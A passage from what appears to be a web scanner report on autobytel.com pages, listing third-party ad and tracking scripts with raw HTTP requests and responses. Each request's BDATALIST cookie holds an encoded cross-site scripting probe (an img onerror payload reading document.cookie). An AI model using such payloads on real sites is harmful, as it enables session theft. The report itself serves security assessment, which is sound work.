  • http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||482348ED-0FE3-85F9-DC91484DEC600C11|||13148|||;sz=1x3;!cat=;ord=46630777?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /car-pictures.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:44:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:44:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:44:32 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:44:32 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 43538


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
348ED-0FE3-85F9-DC91484DEC600C11|||13148|||;sz=728x90;ptile=1;!cat=;ord=46630777?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||482348ED-0FE3-85F9-DC91484DEC600C11|||13148|||;sz=728x90;ptile=1;!cat=;ord=46630777?"></SCRIPT>
...[SNIP]...
D-0FE3-85F9-DC91484DEC600C11|||13148|||;sz=300x250;ptile=2;!cat=;ord=46630777?" name="frame1" width="300" height="250" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
               <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;u=|||482348ED-0FE3-85F9-DC91484DEC600C11|||13148|||;sz=300x250;ptile=2;!cat=;ord=46630777?">
               </SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||482348ED-0FE3-85F9-DC91484DEC600C11|||13148|||;sz=1x3;!cat=;ord=46630777?"></script>
...[SNIP]...
8ED-0FE3-85F9-DC91484DEC600C11|||13148|||;sz=160x600;ptile=3;!cat=;ord=46630777?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||482348ED-0FE3-85F9-DC91484DEC600C11|||13148|||;sz=160x600;ptile=3;!cat=;ord=46630777?">
       </SCRIPT>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.523. http://www.autobytel.com/car-reviews.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-reviews.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||483243AB-FEC5-2441-5ED60EDCE981D749|||13148|||;sz=728x90;ptile=1;!cat=;ord=39086958?
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||483243AB-FEC5-2441-5ED60EDCE981D749|||13148|||;sz=160x600;ptile=3;!cat=;ord=39086958?
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;u=|||483243AB-FEC5-2441-5ED60EDCE981D749|||13148|||;sz=300x250;ptile=2;!cat=;ord=39086958?
  • http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||483243AB-FEC5-2441-5ED60EDCE981D749|||13148|||;sz=1x3;!cat=;ord=39086958?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /car-reviews.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:46:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:46:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:46:10 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:46:10 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 49202


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
243AB-FEC5-2441-5ED60EDCE981D749|||13148|||;sz=728x90;ptile=1;!cat=;ord=39086958?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||483243AB-FEC5-2441-5ED60EDCE981D749|||13148|||;sz=728x90;ptile=1;!cat=;ord=39086958?"></SCRIPT>
...[SNIP]...
B-FEC5-2441-5ED60EDCE981D749|||13148|||;sz=300x250;ptile=2;!cat=;ord=39086958?" name="frame1" width="300" height="250" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
               <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;u=|||483243AB-FEC5-2441-5ED60EDCE981D749|||13148|||;sz=300x250;ptile=2;!cat=;ord=39086958?">
               </SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||483243AB-FEC5-2441-5ED60EDCE981D749|||13148|||;sz=1x3;!cat=;ord=39086958?"></script>
...[SNIP]...
3AB-FEC5-2441-5ED60EDCE981D749|||13148|||;sz=160x600;ptile=3;!cat=;ord=39086958?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||483243AB-FEC5-2441-5ED60EDCE981D749|||13148|||;sz=160x600;ptile=3;!cat=;ord=39086958?">
       </SCRIPT>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.524. http://www.autobytel.com/content/buy/finance/index.cfm/action/Calculator

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/buy/finance/index.cfm/action/Calculator

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.finins/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||479113D3-C20A-EE7D-44A0DBDD3956CE5E|||13148|||;sz=728x90;ptile=1;!cat=;ord=86536114?
  • http://ad.doubleclick.net/adj/abtl.finins/;abr=!ie;kw=;info=13148;u=|||479113D3-C20A-EE7D-44A0DBDD3956CE5E|||13148|||;sz=160x600;ptile=2;!cat=;ord=86536114?
  • http://ad.doubleclick.net/adj/abtl.finins/;kw=;info=13148;u=|||479113D3-C20A-EE7D-44A0DBDD3956CE5E|||13148|||;sz=1x3;!cat=;ord=86536114?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /content/buy/finance/index.cfm/action/Calculator HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 35797
Expires: Mon, 24 Jan 2011 23:28:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:28:34 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:28:34 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:28:34 GMT;path=/
Set-Cookie: PV_CT=3;path=/


<!-- begin: index.cfm -->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengr
...[SNIP]...
113D3-C20A-EE7D-44A0DBDD3956CE5E|||13148|||;sz=728x90;ptile=1;!cat=;ord=86536114?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.finins/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||479113D3-C20A-EE7D-44A0DBDD3956CE5E|||13148|||;sz=728x90;ptile=1;!cat=;ord=86536114?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.finins/;kw=;info=13148;u=|||479113D3-C20A-EE7D-44A0DBDD3956CE5E|||13148|||;sz=1x3;!cat=;ord=86536114?"></script>
...[SNIP]...
3D3-C20A-EE7D-44A0DBDD3956CE5E|||13148|||;sz=160x600;ptile=2;!cat=;ord=86536114?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.finins/;abr=!ie;kw=;info=13148;u=|||479113D3-C20A-EE7D-44A0DBDD3956CE5E|||13148|||;sz=160x600;ptile=2;!cat=;ord=86536114?">
       </SCRIPT>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.525. http://www.autobytel.com/content/buy/index.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/buy/index.cfm

Issue detail

The response dynamically includes the following script from another domain:
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47A27398-0D71-2922-D4AC6FB50C81ECE3|||13148|||;sz=728x90;ptile=1;!cat=;ord=22398696?

Request

GET /content/buy/index.cfm?id=13148;ABTL HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Location: /content/Search/index.cfm?id=13148;ABTL
Server: Microsoft-IIS/7.0
Content-Length: 11939
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:30:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:30:28 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:30:27 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
27398-0D71-2922-D4AC6FB50C81ECE3|||13148|||;sz=728x90;ptile=1;!cat=;ord=22398696?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47A27398-0D71-2922-D4AC6FB50C81ECE3|||13148|||;sz=728x90;ptile=1;!cat=;ord=22398696?"></SCRIPT>
...[SNIP]...

21.526. http://www.autobytel.com/content/buy/index.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/buy/index.cfm

Issue detail

The response dynamically includes the following script from another domain:
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47926A76-DD7B-EB7B-A8EEFACDC658640F|||13148|||;sz=728x90;ptile=1;!cat=;ord=9881368?

Request

GET /content/buy/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Location: /content/Search/index.cfm?id=13148;ABTL
Server: Microsoft-IIS/7.0
Content-Length: 11921
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:28:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:28:42 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:28:42 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
926A76-DD7B-EB7B-A8EEFACDC658640F|||13148|||;sz=728x90;ptile=1;!cat=;ord=9881368?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47926A76-DD7B-EB7B-A8EEFACDC658640F|||13148|||;sz=728x90;ptile=1;!cat=;ord=9881368?"></SCRIPT>
...[SNIP]...

21.527. http://www.autobytel.com/content/buy/warranty/index.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/buy/warranty/index.cfm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||477FCF09-E384-D16D-7CEA699CAF08908B|||13148|||;sz=728x90;ptile=1;!cat=;ord=41947522?
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||477FCF09-E384-D16D-7CEA699CAF08908B|||13148|||;sz=160x600;ptile=2;!cat=;ord=41947522?
  • http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||477FCF09-E384-D16D-7CEA699CAF08908B|||13148|||;sz=1x3;!cat=;ord=41947522?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /content/buy/warranty/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:26:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:26:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:26:42 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:26:42 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 39485


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
FCF09-E384-D16D-7CEA699CAF08908B|||13148|||;sz=728x90;ptile=1;!cat=;ord=41947522?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||477FCF09-E384-D16D-7CEA699CAF08908B|||13148|||;sz=728x90;ptile=1;!cat=;ord=41947522?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||477FCF09-E384-D16D-7CEA699CAF08908B|||13148|||;sz=1x3;!cat=;ord=41947522?"></script>
...[SNIP]...
F09-E384-D16D-7CEA699CAF08908B|||13148|||;sz=160x600;ptile=2;!cat=;ord=41947522?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||477FCF09-E384-D16D-7CEA699CAF08908B|||13148|||;sz=160x600;ptile=2;!cat=;ord=41947522?">
       </SCRIPT>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.528. http://www.autobytel.com/content/home/help/index.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=728x90;ptile=1;!cat=;ord=31515196?
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=160x600;ptile=2;!cat=;ord=31515196?
  • http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=1x3;!cat=;ord=31515196?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /content/home/help/index.cfm?id=13148;ABTL&action=privacy HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:38:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:38:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:38:31 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:38:31 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 55331


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
C3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=728x90;ptile=1;!cat=;ord=31515196?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=728x90;ptile=1;!cat=;ord=31515196?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=1x3;!cat=;ord=31515196?"></script>
...[SNIP]...
